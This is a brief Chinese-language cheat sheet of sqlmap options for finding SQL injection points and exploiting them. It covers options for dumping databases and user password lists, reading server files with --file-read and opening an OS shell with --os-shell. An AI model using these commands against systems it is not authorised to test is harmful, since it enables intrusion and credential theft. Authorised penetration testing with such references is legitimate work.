扫描指定URL
sqlmap -u "网站URL" --cookie="COOKIE值"
扫描文件里的内容
sqlmap -r 文件路径(数据包)
扫描精确位置
http://a/b/c/1*/x
(扫描“1”这个位置的注入点,即扫描“*”前面的注入点)
告诉 sqlmap 被扫描的数据库类型
--dbms=mysql
告诉 sqlmap 注入点位置
-p id
(例如:http://a/b/c/?id=1)
获取关键数据
当前用户:--current-user
数据库:--current-db
管理系统用户列表:--users
管理系统用户密码:--password
管理系统数据库:--dbs
指定数据库所有表:-D 数据库名 --tables
指定表中所有列:-D 数据库名 -T 表名 --columns
指定列中值:-D 数据库名 -T 表名 -C 列名1,列明2 --dump
系统指定文件:--file-read='路径'
使用命令行
--os-shell